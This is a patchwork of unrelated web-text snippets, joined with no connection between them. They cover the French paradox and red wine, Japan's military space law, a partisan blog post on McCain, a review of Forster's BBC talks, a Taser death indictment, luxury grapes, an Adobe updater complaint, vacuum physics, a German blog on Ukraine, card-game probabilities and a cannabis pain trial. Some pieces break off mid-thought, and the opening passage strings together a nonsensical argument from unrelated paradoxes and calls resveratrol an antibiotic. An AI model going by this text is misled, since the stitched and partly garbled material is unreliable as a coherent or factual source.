Both flowers grow wild in Ireland and Great Britain .
The research on the wildflower extracts was carried out by a postgraduate student under the supervision of a CIT professor and a senior medical scientist from the microbiology department of Cork University Hospital .
If the drinker paradox states that in any pub there is a customer such that , if he or she drinks , everybody in the pub drinks and the diamond - water paradox states that water is more useful than diamonds , yet is a lot cheaper , then the French paradox that the French suffer a relatively low incidence of coronary heart disease despite a diet relatively rich in saturated fats , must certainly be true .
The French paradox became popular on an episode of 60 minutes in 1991 with the incorporation of research supporting , red wine as the reason for the decrease in heart disease .
Shortly after the show aired wine sales went up 44 percent .
In general , the popularization of red wine has been lucrative .
Red wine sales in the U.K. are said to have increased 50 percent from the early 1990 ’s as referenced in a 1999 article “ Your Good Health ” in Waitrose Food .
The plant produced antibiotic , resveratol , found in grape skins is one of the supporting factors behind wine as the secret behind the French Paradox .
The phytoalexin that is also sold as a supplement is linked to longevity , cancer prevention and improved athletic performance as stated in a 1993 study by Dr. Serge Renaud , a scientist from Bordeaux University in France whose research supported claims that red wine was responsible for the explanation behind the French paradox .
A 2004 study involving resveratol in the American Journal of Physiology talks about its aid against the stress related condition called cardio fibrosis which makes it more difficult for the heart to pump blood .
Though the natural antibiotic is found in grapes , red wine , grape juice , dark beers and tea , it should be noted that it is absent in white wine , light beers and spirits .
In contradiction to claims made by Renaud , a 1994 study by experts at the Department of Medicine , Oregon Health Sciences University in Portland , found a different reason for the paradox .
In the study that measured 40 countries and 40 dietary variables , France stood out as having a higher consumption rate of plant foods , such as vegetables and vegetable oils containing monounsaturated and polyunsaturated fatty acids , containing protective agents against coronary heart disease .
The French paradox was originally exposed in 1819 by the Irish physician , Samuel Black .
Despite the varying studies , which aim to explain such a phenomenon , another less sustained idea involving the consumption of wine or beer on a regular basis , can perhaps be an explanation .
One reference regarding the less supported idea that alcohol in general can be beneficial for the heart can be found in a 2003 New England Journal of Medicine article .
It is surmised by Professor Morten Grønbæk who is the director of the Centre for Alcohol Research in Copenhagen , Denmark .
“ The main conclusion of ( that ) paper is that , in terms of cardiovascular disease , it does n't really matter how much you drink as long as you drink regularly . "
Reversing a nearly 40 - year - old ban , Japan 's parliament voted on Wednesday to allow the nation 's space programs to be used for national defence .
The country ' upper house of parliament approved the legislation with a 221 to 14 vote , seconding an earlier approval by the lower house and lifting a ban on the military use of space in place since 1969 .
The law gives Japan 's military greater freedom to develop advanced spy satellites for intelligence and allows the country to pursue a joint missile defence shield with the United States .
The law requires that space programs be used for defence only and that they " contribute to establish a safe society , remove various threats to life of the people and ensure peace and safety of international society , as well as the national security of our country . "
Under the new measure , Japan 's defence minister will join a special task force responsible for overseeing Japan 's future space projects .
Japan is prohibited from offensive war by its U.S. - drafted 1947 constitution .
But the country has begun to relax its controls on the military , upgrading the Defence Agency to ministry status last year .
Its space program has also been historically focused on peaceful endeavours such as research and communications .
Japan launched its first satellite in 1970 and has achieved several major scientific coups in space , including launching a probe that collected samples from an asteroid .
But starting with the launch of its first spy satellite in 2003 , Japan has been increasing its presence in space , partly in response to a perceived nuclear threat from Communist North Korea .
It has since launched three other intelligence - gathering satellites .
Where will the truth start ?
McCain agreed to abide by the guidelines ; however , even his answers proved that he knew the questions before hand , his spokesman admitted the was in in the “ Cone of Silence . ”
As you view the interview with Pastor Rick Warren , you must conclude that McCain is still lying because he answered Pastor Warren ’s question before he even asked it .
OMG , can we trust McCain ’s intregrity ?
Now he ’s lying to the man of God .
Where does it end ?
Weigh in people .
UPDATE : Listen to this , he was answering several questions before Warren even asked them .
Check this out .
Weigh in bloggers , what you think ?
Hopefully this issue will not be buried like other issues concerning McCain ; however , visiting other sites , it apprears that it is being pushed on the back burner .
Share this : Twitter
Facebook
Like this : Like Loading ...
Related
The BBC Talks of E.M. Forster , 1929 – 1960 edited by Mary Lago , Linda K. Hughes , and Elizabeth MacLeod Walls , with a foreword by P.N. Furbank University of Missouri Press , 477 pp. , $ 59.95
1 .
In the taxonomy of English writing , E.M. Forster is not an exotic creature .
We file him under Notable English Novelist , common or garden variety .
Still , there is a sense in which Forster was something of a rare bird .
He was free of many vices commonly found in novelists of his generation — what ’s unusual about Forster is what he did n’t do .
He did n’t lean rightward with the years , or allow nostalgia to morph into misanthropy ; he never knelt for the Pope or the Queen , nor did he flirt ( ideologically speaking ) with Hitler , Stalin , or Mao ; he never believed the novel was dead or the hills alive , continued to read contemporary fiction after the age of fifty , harbored no special hatred for the generation below or above him , did not come to feel that England had gone to hell in a hand - basket , that its language was doomed , that lunatics were running the asylum , or foreigners swamping the cities .
Still , like all notable English novelists , he was a tricky bugger .
He made a faith of personal sincerity and a career of disingenuousness .
He was an Edwardian among Modernists , and yet — in matters of pacifism , class , education , and race — a progressive among conservatives .
Suburban and parochial , his vistas stretched far into the East .
A passionate defender of “ Love , the beloved republic , ” he nevertheless persisted in keeping his own loves secret , long after the laws that had prohibited honesty were gone .
Between the bold and the tame , the brave and the cowardly , the engaged and the complacent , Forster walked the middling line .
At times — when defending his liberal humanism against fundamentalists of the right and left — that middle line was , in its quiet , Forsterish way , the most radical place to be .
At other times — in the laissez - faire coziness of his literary ideas — it seemed merely the most comfortable .
In a letter to Goldsworthy Lowes Dickinson , Forster lays out his casual aesthetics , casually :
All I write is , to me , sentimental .
A book which does n’t leave people either happier or better than it found them , which does n’t add some permanent treasure to the world , is n’t worth doing … .
This is my “ theory , ” and I maintain it ’s sentimental — at all events it is n’t Flaubert’s .
How can he fag himself to write “ Un Coeur Simple ” ?
To his detractors , the small , mild oeuvre of E.M.
Forster is proof that when it comes to aesthetics , one had really better be fagged : the zeal of the fanatic is what ’s required .
“ E.M. Forster never gets any further than warming the teapot , ” thought Katherine Mansfield , a fanatic if ever there was one .
“ He ’s a rare fine hand at that .
Feel this teapot .
Is it not beautifully warm ?
Yes , but there ai n’t going to be no tea . ”
There ’s something middling about Forster , he is halfway to where people want him to be .
Even the compilers of The BBC Talks of E.M. Forster , an exhaustive collection of broadcasts between 1929 and 1960 , find it necessary to address the middlebrow elephant in the room :
Forster , though recognized as a central player in …
( CNN ) -- A Louisiana grand jury indicted a former police officer on a manslaughter charge in the death of a man who was Tasered nine times while handcuffed , prosecutors said Wednesday .
Baron Pikes , 21 , was Tasered nine times by a police officer in January in Winnfield , Louisiana .
Scott Nugent also was charged with felony criminal malfeasance in connection with the January death of Baron " Scooter " Pikes .
Pikes , a 21 - year - old sawmill worker , tried to run from Winnfield police , who wanted to arrest him on a warrant charging him with cocaine possession .
A coroner 's report found that Pikes was handcuffed and on the ground when first stunned with a Taser and might have been dead before the last two 50,000 - volt shocks were delivered .
Nugent , who authorities said was the arresting officer , was suspended and ultimately fired in May .
If convicted , Nugent could get up to 40 years for the manslaughter charge and five years for the criminal malfeasance charge , Winn Parish District Attorney R. Chris Nevils said .
" It is our intention to show at trial that Mr. Nugent caused the death of Baron Pikes by Tasing him multiple times , unnecessarily and in violation of Louisiana law , and by failing to get him medical attention when it was apparent he needed it , " Nevils said .
The indictment stems from a state police investigation into the death , which ended in late July .
Nugent 's attorney , Phillip Terrell , could not be immediately reached for comment Wednesday evening .
He said earlier that his client had followed proper police procedure .
A copy of the Winnfield Police Department 's Taser training manual , obtained by CNN , says the device " shall only be deployed in circumstances where it is deemed reasonably necessary to control a dangerous or violent subject . "
Nugent is white ;
Pikes was black .
Pikes ' death led to demonstrations that drew several dozen people in Winnfield , Louisiana , a town of 15,000 , roughly half of whom are black .
Police said Pikes told officers he suffered from asthma and had been using PCP and crack cocaine .
But Dr. Randolph Williams , the Winn Parish medical examiner , said he found no sign of drug use in the autopsy and no record of asthma in Pikes ' medical history .
All About Louisiana • TASER International Inc .
Japanese Grapes : Only $ 900 a Bunch
In Japan , it is common for people to give each other fruit , such as grapes , melons , or apples , as a sort of luxury gift , but every so often it gets a little overboard .
On August 11 , 2008 , in Ishikawa Prefecture Japan , a bunch of “ Ruby Roman ”  grapes were auctioned and purchased by a restaurant owner for a record high of 100,000 yen ( around $ 910 ) .
The bunch had about 35 grapes on it , costing around $ 26 per grape , and each one was as big as a ping pong ball .
The other bunches sold for average of 27,000 yen ( around $ 245 ) .
( link )
Share this : Facebook
Twitter
Pinterest
Reddit
( +186 )
Adobe updater is soooooo horrible .
It NEVER works .
It ALWAYS fails .
I HATE IT .
And you know this .
You must know how bad it is .
It is just that no one wants to work on it .
Because it is so bad .
Offer some kind of bonus to the team that fixes the dad gum friggin ' adobe updater .
Before it is too late .
Cheers , Michael # 865
When the next revolution rocks physics , chances are it will be about nothing — the vacuum , that endless infinite void .
In a discipline where the stretching of time and the warping of space are routine working assumptions , the vacuum remains a sort of cosmic koan .
And as in the rest of physics , its nature has turned out to be mind - bendingly weird : Empty space is not really empty because nothing contains something , seething with energy and particles that flit into and out of existence .
Physicists have known that much for decades , ever since the birth of quantum mechanics .
But only in the last 10 years has the vacuum taken center stage as a font of confounding mysteries like the nature of dark energy and matter ; only recently has the void turned into a tantalizing beacon for cranks .
As one blond celebrity heiress and embodiment of emptiness might say , nothing is hot .
To investigate the mysteries of the void , some physicists are using the biggest scientific instrument ever built — the just - completed Large Hadron Collider , a huge particle accelerator straddling the French - Swiss border .
Others are designing tabletop experiments to see if they can plumb the vacuum for ways to power strange new nanotech devices .
“ The vacuum is one of the places where our knowledge fizzles out and we ’re left with all sorts of crazy - sounding ideas , ” says John Baez , a mathematical physicist at the University of California at Riverside .
Whether in the visionary search for the engine of cosmic expansion or the near - fruitless quest for perpetual free energy , the vacuum is where it ’s happening .
By mining the vacuum ’s riches , a true theory of everything may yet emerge .
Empty space was n’t always so mystifying .
Until the 1920s physicists viewed the vacuum much as the rest of us still do : as a featureless nothingness , a true void .
That all changed with the birth of quantum mechanics .
According to that theory , the space around a particle is filled with countless “ virtual ” particles rapidly bursting into and out of existence like an invisible fireworks display .
Those virtual quantum particles are more than a theoretical abstraction .
Sixty years ago a Dutch physicist named Hendrik Casimir suggested a simple experiment to show that virtual particles can move objects in the real world .
What would happen , he asked , to two metal plates placed very close together in a complete vacuum ?
In the days before quantum mechanics , physicists would have said that the plates would just sit there .
But Casimir realized that the net pressure of all the virtual particles — the stuff of empty space — outside the plates should exert a minuscule force , a nudge from nothing that would push the plates together .
Physicists tried for decades to measure the Casimir force with great precision , but it was n’t until 1997 that technology caught up with theory .
In that year , physicist Steve Lamoreaux , now at Yale , managed to detect the feeble Casimir force on two small surfaces separated by a few thousandths of a millimeter .
Its strength was about equal to the force that would be exerted against the palm of one ’s hand by the weight of a single red blood cell .
At first most physicists regarded the Casimir force as a quantum oddity , something of no practical value .
Now that has changed : Forward thinkers see it as an important energizer for the tiniest of machines , devices on the nano scale , and a few labs are working on ways to use the force to defy the conventional limitations of mechanical design .
Federico Capasso , a physicist at Harvard , leads a small team that is trying to create a repulsive Casimir force by tinkering with the shapes of plates or with the coatings used to cover them .
His entire set of experiments fits on a desktop , and the objects he works with are so small that most of them can not be seen without a microscope .
“ Once you have a repulsive force between two plates , you should be able to eliminate static friction , ” Capasso says .
That could lead to a host of useful applications , including tiny frictionless bearings or nanogears that spin without touching .
“ But the experiments are enormously difficult , so I can not tell you when and how . ”
For all its strangeness , the Casimir force may be the one property of empty space that does not baffle today ’s physicists .
It is garden - variety quantum mechanics , weird but not unexpected .
The same ca n’t be said about dark energy , a truly astonishing discovery made by astronomers a decade ago while observing distant exploding stars .
The explosions revealed a universe expanding at an ever - faster rate , a finding at odds with previous expectations that the expansion of the cosmos should be slowing down , braked by the collective gravitational pull of all the matter out there .
Some unknown form of energy — physicists call it dark energy simply for lack of a more descriptive term — appears to be built into the very fabric of space , countering the gravitational pull of matter and pushing everything in the universe apart .
Some theorists speculate that dark energy might cause a runaway expansion of the universe , resulting in a so - called Big Rip some 50 billion years from now that would tear the cosmos to pieces , shredding even atoms .
The observations have allowed physicists to estimate the quantity of dark energy by deducing the force needed to produce the accelerating effect .
The result is a minuscule amount of energy for every cubic meter of vacuum .
Since most of the cosmos consists of empty space , though , that little bit adds up , and the total amount of dark energy completely dominates the dynamics of the universe .
With the discovery of dark energy came difficult questions :
What is this energy , and where does it come from ?
Physicists simply do not know .
According to quantum mechanics , the energy of empty space comes from the virtual particles that dwell there .
But when physicists use the equations of quantum theory to calculate the amount of that virtual energy , they get a ridiculously huge number — about 120 orders of magnitude too large .
That much energy would literally blow the universe apart :
Objects a few inches from us would be carried away to astronomical distances ; the universe would literally double in size every 10 - 43 second , and it would keep doubling at that rate until all the vacuum energy was gone .
This may be the most colossal gap between observation and theory in the history of science .
And it means that physicists are missing something fundamental about the way the universe works .
“ We ’ve made a prediction on the basis of our best theories , and it is wrong , wildly wrong , ” says Sean Carroll , a theoretical physicist at the California Institute of Technology .
“ That means we do n’t just tweak a parameter here and there ; we really have to think deeply about what our theories are . ”
Even if no one knows where the energy of empty space comes from or why it has the value it does , there is now no doubt that it exists .
And if there is energy to be had , there is inevitably somebody out there thinking of how to exploit it .
The notion of limitless energy from empty space has inspired legions of wannabe physicists who dream of developing the ultimate perpetual - motion device , a machine that would solve the world ’s energy problems forever .
A quick Internet search for the words free energy and vacuum turns up pages and pages of schemes for tapping the vacuum ’s energy .
I ask John Baez if such efforts are as hopeless as previous perpetual - motion machines .
Are they equally crazy and doomed to failure ?
“ Perhaps not as doomed as trying to prove the world is flat , ” Baez says .
“ One thing I can say is that I sure hope it does n’t work , because if you could extract energy from the vacuum , it would mean that the vacuum is not stable .
For normal physicists , ” he adds with a laugh , “ the definition of the vacuum is that it ’s the lowest - energy situation possible — it has less energy than anything else . ”
In short , Baez says , while we may be able to get energy from the vacuum , success “ would mean the universe is far more unstable than we ever dreamed . ”
The reasoning goes like this :
If the vacuum is not at the lowest energy state possible , then at some point in the future , the vacuum could fall to a lower state , pulsing out energy that would threaten the very structure of the cosmos .
If some clever engineer were ever to extract energy from the vacuum , it could set off a chain reaction that would spread at the speed of light and destroy the universe .
Free energy , yes , but not what the inventors had in mind .
So maybe we wo n’t be pulling energy from the vacuum , but we might soon get some different benefits from empty space : confirmation of a 40 - year - old theory and , with any luck , some radically new physics .
This fall the Large Hadron Collider ( LHC ) begins slinging protons at 99.99 percent the speed of light in opposite directions along a circular , 17 - mile course .
In the debris of the collisions that follow , physicists expect to find evidence of yet another strange component of empty space , one that would explain why particles have mass .
Besides virtual particles and dark energy , theorists believe that the universe contains something called the Higgs field .
Like dark energy , the Higgs field is thought to permeate all of space .
But unlike the discovery of dark energy , which was completely unexpected and is still inexplicable , the detection of the Higgs field wo n’t surprise physicists at all .
They have been hunting it ever since Peter Higgs , a physicist at the University of Edinburgh , proposed its existence in 1964 .
Higgs wanted to explain why matter has mass , and more specifically why every particle has a different mass .
He theorized the existence of an invisible field filling all of space and argued that particles acquire mass by interacting with this field .
What we interpret as a particle ’s mass is really the strength of its interaction with the Higgs field .
For a very loose analogy , think of pushing a marble through syrup :
The stickier the syrup , the harder it would be to push it .
If the Higgs field does exist , the LHC should find a previously unseen particle called the Higgs boson .
Just as light , which is an electromagnetic field , is transmitted by particles called photons , physicists expect that the mass - endowing effect of the Higgs field is ferried by Higgs bosons .
The discovery of the Higgs boson would answer one of the most basic puzzles of our reality , and yet physicists seem oddly blasé about the prospect .
“ If it ’s found , that would actually not be that exciting , ” Baez says .
“ It would be a relief , maybe .
Well , it would be exciting , but only in the same sense as if you lose your keys and then you find them again .
Someone would certainly win a Nobel Prize for it , but after the initial excitement , particle physicists would become grumpy because it would just mean that what we thought was true is true , and all the things we do n’t understand we still do n’t understand , and there is still no new evidence . ”
Some researchers , though , expect the LHC to turn up evidence of something very new indeed — extra dimensions of space .
According to M theory­ — the latest , most audacious attempt to explain the fundamental workings of physics — the space around us may be made of as many as 11 dimensions .
M theory proposes that the ultimate building blocks of the universe are not particles but tiny vibrating loops of energy , or strings , as physicists call them .
For complicated mathematical reasons , those loops need 11 dimensions in which to vibrate ; otherwise the theory does n’t work .
We experience only four dimensions ( three of space and one of time ) in everyday life because the other seven are supposedly so small that we do not notice them .
They become evident only on the subatomic scale .
One way to picture this is to imagine a tightrope walker on a high wire .
To the tightrope walker the wire is essentially one - dimensional , a line pointing in one direction .
But an ant crawling on the wire would see it as a three - dimensional object ; the ant could crawl completely around the wire , experiencing a dimension that is inaccessible to the tightrope walker .
String theorists would say we ’re like the tightrope walker , except that our “ rope ” is an 11 - dimensional space , of which we are able to perceive only four dimensions .
Advocates of M theory have had a tough time convincing some of their colleagues about the reality of all those extra dimensions , but the LHC might win some converts .
If extra dimensions really exist , some of the particles produced by the collisions inside the big accelerator may slip away into other dimensions , and particles from higher dimensions could spill into our four - dimensional world .
So if physicists notice a shortfall or a surplus in their particle tallies at the accelerator , it might be the first evidence of the wild new physics to come .
“ Probably whatever is true will in fact be crazy , because historically the truth in physics always seems to be more far - out than anything you could have imagined , ” Baez says .
Some physicists like to think that M theory will form the basis of what they call a theory of everything , a set of laws that will completely describe the universe in all its strangeness , where dark energy , quantum theory , extra dimensions , and magazine readers will all fit into one tidy package .
But in the end , the key to cosmic truth may well come from another window on reality , the looming void .
A good theory of nothing just might be the theory of everything physicists have sought for so long .
Leider überschlagen sich die Meldungen in den letzten Tagen zu den verschiedensten Themen : Das Attentat von Paris , der Krieg in Syrien und dem Irak , die Pegida Demonstrationen und Gegendemonstrationen .
Leider wird dabei nur nebensächlich über den Konflikt in der Ukraine berichtet .
Ich kenne einige Ukrainer , deshalb liegt mir das Thema am Herzen .
Und man darf auch nicht vergessen , welche Gefahr vom Konflikt für Europa ausgeht .
Ein Krieg in der Ukraine gefährdet die ganze Welt
Sollte der Konflikt in der Ukraine eskalieren , dann könnte damit ein Flächenbrand entstehen , der ganz Europa , vielleicht sogar die ganze
Welt betreffen könnte .
Warum ?
Weil es einige Menschen einfach nicht verstehen können , daß man Rußland nicht zu sehr reizen sollte .
Erst der Flugabwehr - Schild , der in Polen aufgebaut werden soll , um IRANISCHE Raketen abzuwehren .
Na klar !
Aber ein Nato Beitritt der Ukraine wäre eine überschrittene rote Linie für Rußland .
Ähnlich der Stationierung von Atomraketen auf Kuba in den fünfziger Jahren des letzten Jahrhunderts für die Amerikaner .
Diese Ukraine Krise ist auch keine Putin Krise .
Wer glaubt , daß sich die Politik in Rußland verbessern würde , wenn Putin nicht mehr an der Macht wäre , der ist sich nicht im klaren , daß es auch schlimmer kommen könnte .
Es gibt viele nationalistische Politiker , die nur zu gerne Russland wieder auf Augenhöhe mit den USA sehen würden .
Man darf nicht vergessen , daß eine Absetzung Putins auch ein Machtvakuum erzeugen würde , in der chaotische Verhältnisse entstehen .
Und eine Atommacht ohne Kontrolle über die Atomwaffen ist ein Alptraum in einer Zeit , wo Islamisten mit viel Geld ausgestattet nur darauf warten eine großen Anschlag durchzuführen !
Grauenvolle Vorstellung …
Sticky Thirteens is a card game which is played at two of my local pubs .
You are given 13 random playing cards .
The dealer then takes his own complete , shuffled deck of 52 and turns them over one at a time , calling out the values .
When all of your 13 cards have appeared , you win .
Obviously there will be many other players , each with their own random 13 taken from different decks ( each 13 - pack is marked and distributed by the pub so nobody can surreptitiously substitute their own fixed deck ) .
So , like Bingo , it is a game of chance , you just wait and see who wins .
There is no skill element .
Ordinarily the dealer just keeps going until somebody calls .
In this case you are assured of an eventual winner , though there may be a tie .
However , at one of the pubs I realised that a different game was being played .
The dealer turned over all but 25 cards , and if nobody won , the game was over .
The jackpot prize was held until the following week , when the dealer would turn over all but 24 cards , and so on , until , naturally , the number got low enough that somebody won .
I studied the game for a while , wondering what the expected winnings were if I were to enter .
I tried to figure out some probabilities but did n't have the space to calculate , but alarm bells were ringing .
Eventually I got home and , the lazy bum that I am , punched the figures into an Excel spreadsheet and hit " Fill " to figure out the actual probabilities .
Guess what ?
Nobody is going to win for a long time .
Formula
Let 's say that you start with 13 cards in your hand , and the deck has 52 cards in it .
As the game progresses , the deck will be turned over one card at a time .
Let 's call the number of cards remaining in the deck , A . A is 52 to begin with .
Every time a card is turned over , you may find yourself able to discard a card from your hand .
Let 's call the number of cards remaining in your hand B .
B is 13 to begin with .
Initial conditions are ( A , B ) = ( 52,13 ) .
You are trying to get to ( A ,0 ) for some value of A .
Let 's call P ( A , B ) the probability of arriving at situation ( A , B ) .
Since we know we start at ( 52,13 ) we know that P ( 52,13 ) =1 .
Let 's say for the sake of argument that the dealer keeps turning cards until all 52 have been revealed , regardless of what happens .
By the end of the deck , you know that all the cards in your hand will have been discarded .
So , we know that P ( 0,0 ) =1 too .
I wo n't bother you with the details of the tedious calculation which led to this formula , but I found that in general :
39 ! 13 ! ( 52 - A ) !
A! P( A , B ) =
---------------------------------
52 ! ( A - B ) ! B! ( 13 - B ) ! ( 39 - A+B ) !
Table
This gives the following table of probabilities :
P( A , B ) Number of cards remaining in hand ( B ) 13 12 11 10 9 8 7 6 5 4 3 2 1 0 Number of cards remaining in deck ( A ) 52 1.00000 51 0.75000 0.25000 50 0.55882 0.38235 0.05882 49 0.41353 0.43588 0.13765 0.01294 48 0.30382 0.43885 0.21349 0.04120 0.00264 47 0.22153 0.41142 0.27428 0.08154 0.01073 0.00050 46 0.16026 0.36765 0.31513 0.12839 0.02602 0.00247 0.00008 45 0.11497 0.31703 0.33568 0.17583 0.04884 0.00713 0.00050 0.00001 44 0.08175 0.26570 0.33817 0.21881 0.07815 0.01563 0.00169 0.00009 0.00000 43 0.05760 0.21739 0.32609 0.25363 0.11189 0.02877 0.00426 0.00035 0.00001 0.00000 42 0.04019 0.17414 0.30334 0.27806 0.14746 0.04684 0.00892 0.00099 0.00006 0.00000 0.00000 41 0.02775 0.13682 0.27365 0.29130 0.18206 0.06952 0.01636 0.00234 0.00019 0.00001 0.00000 0.00000 40 0.01895 0.10558 0.24028 0.29367 0.21315 0.09592 0.02713 0.00479 0.00051 0.00003 0.00000 0.00000 0.00000 39 0.01279 0.08006 0.20587 0.28633 0.23861 0.12469 0.04156 0.00882 0.00117 0.00009 0.00000 0.00000 0.00000 0.0 0000 38 0.00853 0.05969 0.17244 0.27098 0.25696 0.15418 0.05968 0.01492 0.00237 0.00023 0.00001 0.00000 0.00000 0.00000 37 0.00561 0.04376 0.14137 0.24959 0.26741 0.18258 0.08115 0.02356 0.00442 0.00052 0.00004 0.00000 0.00000 0.00000 36 0.00364 0.03154 0.11354 0.22416 0.26982 0.20815 0.10527 0.03509 0.00764 0.00106 0.00009 0.00000 0.00000 0.00000 35 0.00232 0.02234 0.08936 0.19658 0.26463 0.22935 0.13106 0.04971 0.01243 0.00200 0.00020 0.00001 0.00000 0.00000 34 0.00146 0.01554 0.06893 0.16850 0.25275 0.24497 0.15727 0.06740 0.01917 0.00355 0.00041 0.00003 0.00000 0.00000 33 0.00090 0.01062 0.05212 0.14124 0.23541 0.25424 0.18253 0.08788 0.02825 0.00595 0.00079 0.00006 0.00000 0.00000 32 0.00055 0.00711 0.03860 0.11581 0.21401 0.25681 0.20545 0.11062 0.03995 0.00951 0.00144 0.00013 0.00001 0.00000 31 0.00032 0.00467 0.02800 0.09289 0.19001 0.25279 0.22471 0.13482 0.05445 0.01456 0.00250 0.00026 0.00001 0.00000 30 0.00019 0.00300 0.01987 0.07286 0.16481 0.24272 0.23920 0.15947 0.07176 0.02147 0.00413 0.00048 0.00003 0.00000 29 0.00011 0.00188 0.01378 0.05586 0.13966 0.22744 0.24811 0.18339 0.09169 0.03056 0.00658 0.00086 0.00006 0.00000 28 0.00006 0.00115 0.00933 0.04183 0.11558 0.20804 0.25097 0.20534 0.11383 0.04216 0.01012 0.00149 0.00012 0.00000 27 0.00003 0.00068 0.00616 0.03056 0.09337 0.18575 0.24766 0.22408 0.13750 0.05646 0.01506 0.00246 0.00022 0.00001 26 0.00002 0.00040 0.00395 0.02175 0.07356 0.16183 0.23849 0.23849 0.16183 0.07356 0.02175 0.00395 0.00040 0.00002 25 0.00001 0.00022 0.00246 0.01506 0.05646 0.13750 0.22408 0.24766 0.18575 0.09337 0.03056 0.00616 0.00068 0.00003 24 0.00000 0.00012 0.00149 0.01012 0.04216 0.11383 0.20534 0.25097 0.20804 0.11558 0.04183 0.00933 0.00115 0.00006 23 0.00000 0.00006 0.00086 0.00658 0.03056 0.09169 0.18339 0.24811 0.22744 0.13966 0.05586 0.01378 0.00188 0.00011 22 0.00000 0.00003 0.00048 0.00413 0.02147 0.07176 0.15947 0.23920 0.24272 0.16481 0.07286 0.01987 0.00300 0.00019 21 0.00000 0.00001 0.00026 0.00250 0.01456 0.05445 0.13482 0.22471 0.25279 0.19001 0.09289 0.02800 0.00467 0.00032 20 0.00000 0.00001 0.00013 0.00144 0.00951 0.03995 0.11062 0.20545 0.25681 0.21401 0.11581 0.03860 0.00711 0.00055 19 0.00000 0.00000 0.00006 0.00079 0.00595 0.02825 0.08788 0.18253 0.25424 0.23541 0.14124 0.05212 0.01062 0.00090 18 0.00000 0.00000 0.00003 0.00041 0.00355 0.01917 0.06740 0.15727 0.24497 0.25275 0.16850 0.06893 0.01554 0.00146 17 0.00000 0.00000 0.00001 0.00020 0.00200 0.01243 0.04971 0.13106 0.22935 0.26463 0.19658 0.08936 0.02234 0.00232 16 0.00000 0.00000 0.00000 0.00009 0.00106 0.00764 0.03509 0.10527 0.20815 0.26982 0.22416 0.11354 0.03154 0.00364 15 0.00000 0.00000 0.00000 0.00004 0.00052 0.00442 0.02356 0.08115 0.18258 0.26741 0.24959 0.14137 0.04376 0.00561 14 0.00000 0.00000 0.00000 0.00001 0.00023 0.00237 0.01492 0.05968 0.15418 0.25696 0.27098 0.17244 0.05969 0.00853 13 0.00000 0.00000 0.00000 0.00000 0.00009 0.00117 0.00882 0.04156 0.12469 0.23861 0.28633 0.20587 0.08006 0.01279 12 0.00000 0.00000 0.00000 0.00003 0.00051 0.00479 0.02713 0.09592 0.21315 0.29367 0.24028 0.10558 0.01895 11 0.00000 0.00000 0.00001 0.00019 0.00234 0.01636 0.06952 0.18206 0.29130 0.27365 0.13682 0.02775 10 0.00000 0.00000 0.00006 0.00099 0.00892 0.04684 0.14746 0.27806 0.30334 0.17414 0.04019 9 0.00000 0.00001 0.00035 0.00426 0.02877 0.11189 0.25363 0.32609 0.21739 0.05760 8 0.00000 0.00009 0.00169 0.01563 0.07815 0.21881 0.33817 0.26570 0.08175 7 0.00001 0.00050 0.00713 0.04884 0.17583 0.33568 0.31703 0.11497 6 0.00008 0.00247 0.02602 0.12839 0.31513 0.36765 0.16026 5 0.00050 0.01073 0.08154 0.27428 0.41142 0.22153 4 0.00264 0.04120 0.21349 0.43885 0.30382 3 0.01294 0.13765 0.43588 0.41353 2 0.05882 0.38235 0.55882 1 0.25000 0.75000 0 1.00000
These figures are to five decimal places .
Several probabilities are so low that they register as 0 on this scale , however , only the blank cells represent actually impossible events .
Simplified formula
The important column is , as I 've said , P( A , 0 ) , which is the far right side .
Setting B =0 allows us to simplify the formula to :
39 ! ( 52 - A ) ! P( A,0 ) =
------------- 52 ! ( 39 -A ) !
Simplified table
The right two columns of this assume 15 players each week .
Undrawn cards ( A ) P( A ,0 ) P ( no one wins ) P ( no one has won yet )
52 0 1 1 51 0 1 1 50 0 1 1 49 0 1 1 48 0 1 1 47 0 1 1 46 0 1 1 45 0 1 1 44 0 1 1 43 0 1 1 42 0 1 1 41 0 1 1 40 0 1 1 39 0.00000 1.00000 1.00000 38 0.00000 1.00000 1.00000 37 0.00000 1.00000 1.00000 36 0.00000 1.00000 1.00000 35 0.00000 1.00000 1.00000 34 0.00000 1.00000 1.00000 33 0.00000 1.00000 1.00000 32 0.00000 1.00000 1.00000 31 0.00000 1.00000 0.99999 30 0.00000 0.99999 0.99998 29 0.00000 0.99997 0.99995 28 0.00000 0.99994 0.99989 27 0.00001 0.99988 0.99977 26 0.00002 0.99975 0.99953 25 0.00003 0.99953 0.99905 24 0.00006 0.99912 0.99817 23 0.00011 0.99840 0.99657 22 0.00019 0.99717 0.99376 21 0.00032 0.99514 0.98892 20 0.00055 0.99183 0.98084 19 0.00090 0.98655 0.96764 18 0.00146 0.97830 0.94665 17 0.00232 0.96569 0.91417 16 0.00364 0.94678 0.86552 15 0.00561 0.91907 0.79548 14 0.00853 0.87945 0.69958 13 0.01279 0.82440 0.57674 12 0.01895 0.75053 0.43286 11 0.02775 0.65567 0.28381 10 0.04019 0.54051 0.15340 9 0.05760 0.41070 0.06300 8 0.08175 0.27821 0.01753 7 0.11497 0.16010 0.00281 6 0.16026 0.07281 0.00020 5 0.22153 0.02337 0.00000 4 0.30382 0.00437 0.00000 3 0.41353 0.00033 0.00000 2 0.55882 0.00000 0.00000 1 0.75000 0.00000 0.00000 0 1.00000 0.00000 0.00000
In other words , at A =25 , the odds of a given person winning are around 32,000 to 1 !
It looks like we 're going to be here until we get down to around 14 cards at the earliest , or another 10 weeks .
Still , by that time , maybe the jackpot will be large enough to make the investment worthwhile , hmm ?
I wonder if there 's a limit on how many times you can enter each week .
Generalised formula
For a deck of size X and a hand of size Y , the formula is :
( X-Y ) ! Y! ( X - A ) !
A! P( A , B ) =
------------------------------------
X! ( A - B ) ! B ! ( Y - B ) ! ( ( X-Y ) - ( A - B ) ) !
In a double - blind , placebo - controlled clinical trial to assess the impact of smoked medical cannabis , or marijuana , on the neuropathic pain associated with HIV , researchers at the University of California , San Diego School of Medicine found that reported pain relief was greater with cannabis than with a placebo .
The study , sponsored by the University of California Center for Medical Cannabis Research ( CMCR ) based at UC San Diego , will be published on line , August 6 in the journal Neuropsychopharmacology .
Led by Ronald J. Ellis , M.D. , Ph.D. , associate professor of neurosciences at UCSD School of Medicine , the study looked at 28 HIV patients with neuropathic pain not adequately controlled by other pain - relievers , including opiates .
They took part in the controlled study as outpatients at the UCSD Medical Center .
The proportion of subjects achieving pain reduction of 30 percent or more was greater for those smoking cannabis than those smoking the placebo .
